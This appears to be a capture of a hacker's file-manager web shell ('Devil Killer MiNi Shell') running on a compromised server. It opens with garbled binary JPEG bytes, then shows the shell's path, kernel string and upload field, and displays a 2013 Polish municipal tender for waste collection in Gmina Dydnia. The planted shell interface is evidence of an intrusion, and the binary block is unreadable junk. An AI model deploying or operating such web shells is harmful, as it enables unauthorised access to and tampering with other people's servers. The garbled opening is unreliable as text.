JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130521/197802-N-2013.html

<p class="kh_header"><b>Dydnia: Odbiór i transport odpadów komunalnych od właścicieli nieruchomości             zamieszkałych na terenie Gminy Dydnia do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych w Krośnie.</b><br>
<b>Numer ogłoszenia: 197802 - 2013; data zamieszczenia: 21.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dydnia , Dydnia 224, 36-204 Dydnia, woj. podkarpackie, tel. 013 4303002, 4308154, faks 013 4303194.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i transport odpadów komunalnych od właścicieli nieruchomości             zamieszkałych na terenie Gminy Dydnia do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych w Krośnie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.2.	Przedmiot zamówienia:                             
2.2.1. 	Przedmiotem zamówienia jest odbiór, transport odpadów komunalnych, powstałych 	na nieruchomościach zamieszkałych położonych na terenie Gminy Dydnia wystawionych 	przez właścicieli (współwłaścicieli, użytkowników wieczystych, posiadaczy, najemców) w pojemnikach (workach foliowych) o pojemności 120 l lub mniejszych, oznaczonych naklejką z nadrukiem kodu kreskowego przyporządkowanym do poszczególnych adresatów nieruchomości - w dniach wywozu, określonych w załączonym harmonogramie wywozu - zał. nr 3 do SIWZ. 
2.2.2.	Wykonawca jest zobowiązany do odbioru odpadów komunalnych od właścicieli nieruchomości w sposób selektywny i nieselektywny, zapobiegając ich mieszaniu. 
2.3.	Rodzajów odpadów: 

a)	niesegregowanych (zmieszanych) odpadów komunalnych 	-  (kod 200301), 
b)	selektywnie zbieranych odpadów komunalnych  - tj.:

b.1. tworzywa sztuczne, opakowania z tworzyw sztucznych  	- (kod 200139, 150102), 
b.2. szkło, opakowania ze szkła 				- (kod 200102, 150107),
b.3. metale, opakowania z metali 			- (kod 200140, 150104), 
b.4. papier i tektura 						- (kod 200101), 
b.5. opakowania wielomateriałowe  			- (kod 150105), 
b.6. odpady biodegradowalne i odpady zielone  	-  (kod 200201), 
b.7. odpady wielkogabarytowe 				-  (kod 200307),
b.8. odpady elektryczne i elektroniczne               -  (kody 200123, 200135 i 200136),                                                                                                       b.9. baterie i akumulatory 					-  (kod 200133), 
b.10. przeterminowane leki 				-  (kod 180109), 
b.11. chemikalia 						-  (kod 180106), 
b.12. zużyte opony 						-  (kod 160103),

2.4. 	Odpady z punktów selektywnego zbierania odpadów komunalnych wymienione w pkt 2.3.b będą odbierane - okresowo co 3- m-ce.

2.4.1. 	Według Planu Gospodarki Odpadami dla Województwa Podkarpackiego, wszystkie zebrane zmieszane odpady komunalne muszą być przekazane do Regionalnej	instalacji przetwarzania Odpadów Komunalnych przy ul. Białobrzeskiej w Krośnie.
2.4.1.1. Zgodnie z zawartym porozumieniem pomiędzy zarządcą RIPOK            a Gminą Dydnia, również odpady segregowane (oddzielnie) muszą być przekazane do Regionalnej instalacji 	przetwarzania 	Odpadów Komunalnych przy ul. Białobrzeskiej w Krośnie.
2.4.2.  	Punkt selektywnej zbiórki odpadów:

2.4.2.1. 	Wykonawca zapewni odbiór i transport odpadów z punktu selektywnego zbierania odpadów komunalnych - jak w pkt 2.3.b (zorganizowanego przez Zamawiającego na bazie Zakładu Gospodarki Komunalnej w Dydni), zlokalizowanego w miejscowości Jabłonka, gm. Dydnia.

2.4.2.2.W dniu odbioru odpadów Wykonawca zobowiązany jest zorganizować załadunek odpadów 	zebranych w punktach selektywnej zbiórki odpadów oraz zapewnić odpowiednie środki transportu umożliwiające transport odpadów do RIPOK w dniu ich zbiórki. 

2.4.2.3.	Termin odbioru odpadów z punktu selektywnej zbiórki odpadów Zamawiający uzgodni z Wykonawcą pisemnie, nie później niż 10 dni przed planowanym terminem wywozu.
2.4.5.  W punktach selektywnej zbiórki gromadzone będą (mogą być) następujące rodzaje odpadów:

- tworzywa sztuczne, opakowania z tworzyw sztucznych  - (kod 200139, 150102), 
- szkło, opakowania ze szkła 				- (kod 200102, 150107),
- metale, opakowania z metali 				- (kod 200140, 150104), 
- papier i tektura 						- (kod 200101), 
- opakowania wielomateriałowe 				- (kod 150105), 
- odpady biodegradowalne i odpady zielone   	-  (kod 200201), 
- odpady wielkogabarytowe 				-  (kod 200307),
- odpady elektryczne i elektroniczne 			-  (kody 200123, 200135 i 200136),                                                                                                       - baterie i akumulatory 					-  (kod 200133), 
- przeterminowane leki 					-  (kod 180109), 
- chemikalia 						        -  (kod 180106), 
- zużyte opony 						        -  (kod 160103).
	
2.5.	Częstotliwość odbioru odpadów komunalnych:
2.5.1. 	Częstotliwość odbioru odpadów komunalnych w następujący sposób:
1.	Odpady zmieszane	 - co dwa tygodnie,  wg harmonogramu, - zał. nr 3 do SIWZ.

2.	Odpady segregowane:

1)	 papier i tektura, szkło, tworzywa sztuczne, metal i opakowania wielomateriałowe 			- co dwa tygodnie -  wg zał. nr 3 do SIWZ,
2)	odpady ulegające biodegradacji 			- dwa razy do roku, 
3)	przeterminowane leki i chemikalia (farby, rozpuszczalniki, oleje odpadowe itd.), zużyte baterie i akumulatory, zużyte opony opakowania po środkach ochrony roślin 		-  raz w roku, 
4)	 zużyty sprzęt elektryczny i elektroniczny,                                       meble i inne odpady  wielkogabarytowe  		-  dwa razy w roku, 
5)	odpady budowlano - remontowe  i rozbiórkowe	 - w zależności od potrzeb na indywidualne zamówienie u przedsiębiorcy.

3.	Odpady zbierane selektywnie mieszkańcy mogą  przekazywać indywidualnie do gminnego punktu zbiórki odpadów w dniach roboczych w godzinach pracy.
2.5.2.	Terminy odbioru odpadów:                                
2.5.2.1.Terminy odbioru odpadów określono w załączonym dotychczas stosowanym harmonogramie wywozu odpadów komunalnych - zał. nr 3 do SIWZ.

2.5.2.2.	Odbiór odpadów nie może odbywać się w niedzielę i dni ustawowo wolne od pracy. 

2.5.2.3.	W sytuacjach nadzwyczajnych (np. nieprzejezdność, zamknięta droga, itp.), gdy nie jest możliwa realizacja usługi zgodnie z harmonogramem, termin odbioru odpadów będzie 	każdorazowo uzgadniany pomiędzy Zamawiającym i Wykonawcą. 

O nowym terminie wywozu odpadów Wykonawca poinformuje właścicieli nieruchomości. W takich przypadkach Wykonawcy nie przysługuje dodatkowe wynagrodzenie. 

2.5.	 Worki na odpady:
 
2.5.1.	Właściciele nieruchomości we własnym zakresie zaopatrują się w odpowiednie pojemniki 	(worki) na poszczególne odpady zmieszane i segregowane w następujących kolorach: 

- czarny lub niebieski - odpady komunalne zmieszane,                                     - bezbarwny - szkło i opakowania szklane bezbarwne i kolorowe                       - żółty- tworzywa sztuczne białe i kolorowe, opakowania wielomateriałowe,        - zielony - papier i tekturę (w tym opakowania, gazety, czasopisma itp.),          - brązowy - odpady zielone i ulegające biodegradacji,                                      - czerwony - metal.

2.5.2.	Kody kreskowe - naklejki:
 
2.5.3.	Wystawione worki z poszczególnymi rodzajami odpadów będą posiadały naklejki 	samoprzylepne z kodem kreskowym,  które będą identyfikować rodzaj odpadów i właścicieli 	nieruchomości. 

2.5.4.	Zamawiający wyposaży właścicieli nieruchomości zamieszkałych w odpowiednią ilość naklejek 	z kodami kreskowymi, według których będą identyfikowane poszczególne pojemniki (worki) z odpadami zmieszanymi i segregowanymi.
 
2.5.4.1. Rodzaje naklejek kodowych:

	1. naklejka z kodem na odpady zmieszane,
	2. naklejka z kodem (jednakowa na wszystkie) na odpady segregowane, gdzie o rodzaju odpadów 	segregowanych będzie decydował kolor worka.

2.5.4.2.Worki nieoznaczone kodami kreskowymi mogą być odebrane, jeżeli Wykonawca poinformuje Zamawiającego o tym fakcie (np. telefonicznie) i otrzyma jego akceptację lub wcześniej otrzyma zgłoszenie od Zamawiającego przed  terminem odbioru odpadów bez kodów kreskowych. W innym przypadku nie należy odbierać worków nieoznaczonych kodem kreskowym. 

2.5.5.	Zamawiający przekaże Wykonawcy laserowy jeden czytnik kodów kreskowych (pidion z lokalizatorem GPS) z 	pamięcią roboczą. Urządzenie jest kompatybilne ze smartfonami z systemami operacyjnymi Windows i Android. Po dokonaniu odczytów Wykonawca dostarczy dane do stanowiska obsługującego system gospodarki odpadami (lub poprzez bezpośredni eksport danych z czytnika) w Urzędzie Gminy w Dydni. 
2.5.5.1. Na prośbę Wykonawcy Zamawiający może wygenerować program  niezbędny do obsługi odbioru odpadów. Przewidziane jest szkolenie w zakresie obsługi i przetwarzania w/w danych.    
 
2.5.6. 	Zamawiający w terminie do 5 dni od zawarcia umowy, przekaże Wykonawcy wykaz nieruchomości zamieszkałych (których właściciele złożyli stosowne deklaracje), skąd należy odebrać odpady komunalne. Jeżeli w trakcie trwania umowy zajdzie potrzeba odbioru odpadów z dodatkowych 			nieruchomości zamieszkałych, Zamawiający przekaże Wykonawcy wykaz takich nieruchomości w terminie 7 dni od dnia złożenia deklaracji, a Wykonawca włączy te nieruchomości niezwłocznie zakresu do przedmiotu zamówienia.
      
3.	Dane za lata 2011 i 2012 -  orientacyjne charakteryzujące przedmiot zamówienia:
3.1. Liczba nieruchomości od których odbierano odpady w 2012 r. z terenu Gminy Dydnia     -  1 895.                                                                           3.2. Liczba nieruchomości w podziale na sołectwa:  
- Dydnia	-     	351;                                     	                                             - Krzemienna	-  	126;                                     	                                     - Grabówka	- 	110;                                      	                                    - Obarzym  	- 	  79;			                                                             - Jabłonka	- 	243;			                                                                    - Temeszów 	- 	  77;                                                                             - Niebocko 	- 	358;				                                                   -  Ulucz 	- 	  28;                                                                                      - Niewistka	- 	  75;                                                                             - Witryłów 	- 	103;                                                                             - Końskie 	-  	106;                                                                                      - Wydrna	- 	143.                                                                                      - Krzywe 	- 	  96;                                                 
3.3.  Masa odebranych odpadów ogółem z obszarów wiejskich (2011r.)                 - o kodzie 200301 - 664,66 Mg /rok                                   - w tym:      
- opakowania z papieru i tektury - kod 150101	- 	 3,24 Mg;                      - opakowania z tworzyw sztucznych  - kod 150102	-   	 9,07 Mg;              - opakowania ze szkła - kod 150107			-	11,22 Mg; 		            - biodegradowalne 					-	17,99 Mg.
3.3.1. Masa odebranych odpadów z obszarów wiejskich (2012 r.) - o kodzie 200301,200303 - 681,50Mg/rok                                    	                 - w tym:      
- opakowania z papieru i tektury - kod 150101			- 	 1,20 Mg;       - opakowania z tworzyw sztucznych  - kod 150102		-   	12,20 Mg;     - opakowania ze szkła - kod 150107				-	19,70 Mg;              - zużyte urz. elektryczne i elektroniczn - kod 200121 i 200123 -	22,00 Mg;      - biodegradowalne               					-	  1,20 Mg.
3.3.2.	Podane powyżej dane liczbowe są szacunkowe  i mogą ulec zmianie na etapie realizacji zamówienia
3.4.	Na dzień ogłoszenia przetargu  złożono ok. 92 % przewidywanej ogólnej ilości deklaracji (złożone deklaracje obejmują 6400 osób), gdzie tylko ok. 14% - właścicieli nieruchomości zamieszkałych - wg złożonych deklaracji przewiduje oddawać odpady - jako niesegregowane.                                                                                      Obecnie niema żadnych możliwości wyliczenia rzeczywistych rodzajów i ilości odpadów przewidzianych do odbioru wg złożonych deklaracji.

4. 	Wykonawca zobowiązuje się do: 

a)	wykonania przedmiotu zamówienia z: 

- obowiązującymi z Ustawą z dnia 14 grudnia 2012 r. o odpadach (Dz.U.2013r., Nr 21), 
- ustawą z dnia 13 września 1996 o utrzymaniu czystości i porządku w gminach (Dz.U. 2012, poz. 391 z późn. zm), wraz z przepisami wykonawczymi, 
- Uchwałą Nr XXIII/192/2012 z dnia 20 grudnia 2012 r. Rady Gminy Dydnia w sprawie Regulaminu utrzymania czystości i porządku na terenie Gminy Dydnia oraz uchwały nr XXVII/237/2013 Rady Gminy Dydnia z dnia 18 kwietnia 2013 roku w sprawie zmiany uchwały własnej nr XXIII/192/2012 z dnia 20 grudnia 2012 roku w sprawie przyjęcia Regulaminu utrzymania czystości i porządku na terenie Gminy Dydnia,
- Uchwałą Nr XXIII/196/2012 z dnia 20 grudnia 2012 r. Rady Gminy Dydnia w sprawie  określenia szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania opadów komunalnych od właścicieli nieruchomości i i zagospodarowania tych odpadów oraz uchwały nr XXVII/238/2013 Rady Gminy Dydnia z dnia 18 kwietnia 2013 roku w sprawie zmiany uchwały własnej nr XXIII/196/2012 z dnia 20 grudnia 2012 roku w sprawie określenia szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów
            - przepisami prawa ochrony środowiska oraz 	przepisami sanitarnymi, w tym rozporządzeniem 	Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie 	odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. 2013, poz. 122).                                                                                                        	- postanowieniami umowy, z należytą starannością, aktualnym poziomem wiedzy technicznej, oraz przepisami BHP, przez osoby posiadające wymagane kwalifikacje i uprawnienia, 
	- Rozporządzeniem Ministra Środowiska z dnia 15 maja 2012 r. w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi (Dz.U. z 2012r. poz. 630),
	- Rozporządzeniem Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz 	sposobu obliczania poziomu ograniczania masy tych odpadów (Dz.U z 2012r. poz. 676),
	- Rozporządzeniem Ministra Środowiska z dnia 16 czerwca 2009 roku w sprawie bezpieczeństwa i higieny pracy przy gospodarowaniu odpadami komunalnymi (Dz. U. z 2009 r. nr 104 poz.868),
	- Planu Gospodarki Odpadami dla Województwa Podkarpackiego i uchwały Nr XXIV/410/12	Sejmiku Województwa Podkarpackiego z dnia 27 sierpnia 2012 r. w sprawie wykonania Planu Gospodarki Odpadami dla Województwa Podkarpackiego z późn. zm.,

b)	dostosowania wielkości, tonażu i rodzaju pojazdów odbierających odpady do istniejących parametrów dróg, 
c)	Wykonawca ponosi odpowiedzialność za:
- ewentualne szkody wyrządzone przez pojazdy odbierające odpady,
- szkody spowodowane w ramach wykonywania przedmiotu umowy na nieruchomościach prywatnych, osób trzecich a także mienia gminnego, Wykonawca zobowiązuje się doprowadzić do stanu pierwotnego na własny koszt, 
d)	zachowania uzyskanych danych w takcie realizacji umowy, a w szczególności danych osobowych poufnych i będzie stosował się do zasad ustawy o ochronie danych osobowych,
e)	 realizacji sprawozdawczości w zakresie przedmiotu umowy, 
f)	sporządzania i przekazywania  sprawozdań kwartalnych Zamawiającemu, zgodnie z art. 9n ustawy       z dnia 13 września 1996 o utrzymaniu czystości i porządku w gminach (Dz.U. 2012, poz. 391                   z późn. zm), oraz sprawozdania odnośnie ilości i rodzajów odpadów odebranych z Punktu Selektywnej Zbiórki Odpadów w ciągu 14 dni od dnia zbiórki, 
g)	udostępnienia niezwłocznie wszelkich danych, związanych z realizacją zamówienia,
h)	wyrywkowej kontroli rzetelności segregacji odpadów - tj. sprawdzenia zawartości worka z oznaczeniem kodu kreskowego. O każdym przypadku stwierdzenia nieprawidłowości należy niezwłocznie powiadomić pisemnie Zamawiającego z podaniem kodu nieruchomości i udokumentowaniem zaistniałego naruszenia - (notatka sporządzona przez dwóch pracowników i dokumentacja fotograficzna), 
i)	utrzymania w należytej czystości miejsc po odbiorze odpadów, a w razie potrzeby uprzątania miejsc po zebraniu odpadów, oraz utrzymania czystości urządzeń i pojazdów, którymi będzie odbierał i transportował odpady w celu osiągnięcia wymaganego standardu świadczonych usług.
j)	zorganizowania odbioru i transportu odpadów, również w przypadkach, kiedy dojazd do właścicieli	nieruchomości zamieszkałych będzie utrudniony z powodu prowadzonych remontów dróg, zmiany 	organizacji ruchu drogowego itp., braku możliwości dojazdu - odpady komunalne winny zostać 	odebrane w możliwie najkrótszym terminie. W takich przypadkach Wykonawcy nie przysługują roszczenia z tytułu wzrostu kosztów realizacji przedmiotu umowy,
k)	realizacji przedmiotu zamówienia bez względu na warunki atmosferyczne,
l)	utrzymania odpowiedniego stanu technicznego pojazdów i sprzętu przeznaczonego do odbioru transportu odpadów,
m)	interwencyjnego odbioru odpadów komunalnych poza terminem wynikającym z harmonogramu, na telefoniczne lub pisemne zgłoszenie Zamawiającego, w ciągu 3 dni od dnia zgłoszenia, w przypadku gdy odpady zagrażają bezpieczeństwu życia lub zdrowia ludzi,
n)	utrzymania stałego kontaktu z Zamawiającym w sprawach dotyczących przedmiotu zamówienia,               
o)	umożliwić Zamawiającemu przeprowadzenie kontroli bazy magazynowo - transportowej, w szczególności stanu ilościowego posiadanych pojazdów, ich wyposażenia, poprawności działania systemu monitoringu bazującego na systemie pozycjonowania satelitarnego.
      l) 	po podpisaniu umowy Wykonawca w terminie do 14 dni winien:
	- zainstalować na wskazanym przez Zamawiającego stanowisku komputerowym oprogramowania	pozwalającego na bieżący odczyt monitoringu bazującego na systemie pozycjonowania satelitarnego 	umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdów 	i miejscach postoju oraz czujników zapisujących dane o miejscach wyładunku odpadów w celu 	weryfikacji prawidłowości świadczenia usługi zgodnie z przedmiotem zamówienia,
- przekazać szczegółowy wykaz sprzętu, który będzie używany do realizacji przedmiotu zamówienia wraz z numerami rejestracyjnymi,
5.	Wykonawca oświadcza, że przy realizacji przedmiotu umowy nie dokona naruszenia cudzych praw wyłącznych oraz, że w razie stwierdzenia ich naruszenia poniesie wszelkie konsekwencje prawne i finansowe z tytułu ewentualnych roszczeń. 

6.	W przypadku zmiany przepisów prawa - w szczególności związanych z przedmiotem 	zamówienia Zamawiający w porozumieniu z Wykonawca określą zakres czynności zmierzających do 	wypełnienia postanowień umowy i sposobu ich realizacji.
 
7.	Zamawiający ma prawo do kontroli sposobu, częstotliwości i jakości wykonywanych usług 	związanych z realizacją zamówienia. Na wniosek Zamawiającego Wykonawca skieruje swego 	przedstawiciela do udziału w kontroli realizacji zamówienia.

8.	Zamawiający zastrzega sobie prawo do zwiększenia lub zmniejszenia liczby obsługiwanych 	nieruchomości w zakresie odbioru odpadów komunalnych.

9.	Wykonawca zabezpieczy Zamawiającemu i właścicielom nieruchomości zabudowanych, możliwość 	kontaktu telefonicznego oraz drogą emaliową z jego przedstawicielem - co najmniej w godzinach: 7:00-15:00 w dni robocze..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zakazane są istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy, chyba, że wystąpią okoliczności, które przemawiają za koniecznością zmiany postanowień umowy. 
14.1.		W przypadku zmiany przepisów prawa - w szczególności związanych z przedmiotem 	zamówienia Zamawiający w porozumieniu z Wykonawca określą zakres czynności zmierzających do 	wypełnienia postanowień umowy i sposobu ich realizacji.
14.2.		Okoliczności powodujące zwiększenie lub zmniejszenie liczby obsługiwanych 	nieruchomości 	w zakresie odbioru odpadów komunalnych.
14.3.		Powyższe okoliczności stanowią warunki zmiany umowy, o których mowa w art. 144 ust. 1 PZP w przypadku wystąpienia takiej okoliczności. Wszelkie zmiany i uzupełnienia treści umowy wymagają formy pisemnej w postaci aneksu pod rygorem nieważności.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> - nie występuje.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien posiadać wpis do rejestru działalności regulowanej, o którym mowa w art. 9b i 9c ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach, prowadzonego przez Wójta Gminy Dydnia, w zakresie objętym przedmiotem zamówienia,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Za spełnienie warunku posiadania wiedzy i doświadczenia uzna udokumentowanie wykonanych,	usług (wykonali na rzecz właścicieli nieruchomości usługę odbioru odpadów komunalnych w ciągu 6 miesięcy co najmniej o masie minimum: - 300 Mg), w okresie ostatnich trzech lat		przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości,przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, 		oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- udokumentowanie dysponowania odpowiednim potencjałem technicznym - zgodnie z Rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości - jak niżej:

1.	 Wykonawca odbierający odpady komunalne od właścicieli nieruchomości jest obowiązany posiadać bazę magazynowo-transportową usytuowaną:

1) w gminie Dydnia, z której terenu odbiera te odpady, lub w odległości nie większej niż 60 km od granicy tej gminy;
	2) na terenie, do którego posiada tytuł prawny.

2.	W zakresie wyposażenia bazy magazynowo-transportowej należy zapewnić, aby:

	1) teren bazy magazynowo-transportowej był zabezpieczony w sposób uniemożliwiający wstęp osobom nieupoważnionym;
2) miejsca przeznaczone do parkowania pojazdów były zabezpieczone przed emisją zanieczyszczeń do gruntu;
	3) teren bazy magazynowo-transportowej był wyposażony w urządzenia lub systemy zapewniające 	zagospodarowanie wód opadowych i ścieków przemysłowych, pochodzących z terenu bazy zgodnie z wymaganiami określonymi przepisami ustawy z dnia 18 lipca 2001 r. - Prawo wodne (Dz. U.                	z 2012 r. poz. 	145, 951 i 1513 oraz z 2013 r. poz. 21);
	4) baza magazynowo-transportowa była wyposażona w:

		a) miejsca przeznaczone do parkowania pojazdów,
		b) pomieszczenie socjalne dla pracowników odpowiadające liczbie zatrudnionych osób,
				
	5) Na terenie bazy magazynowo-transportowej powinny znajdować się także:

		a) punkt bieżącej konserwacji i napraw pojazdów,
		b) miejsce do mycia i dezynfekcji pojazdów - o ile czynności te nie są wykonywane przez uprawnione podmioty zewnętrzne poza terenem bazy magazynowo-transportowej.
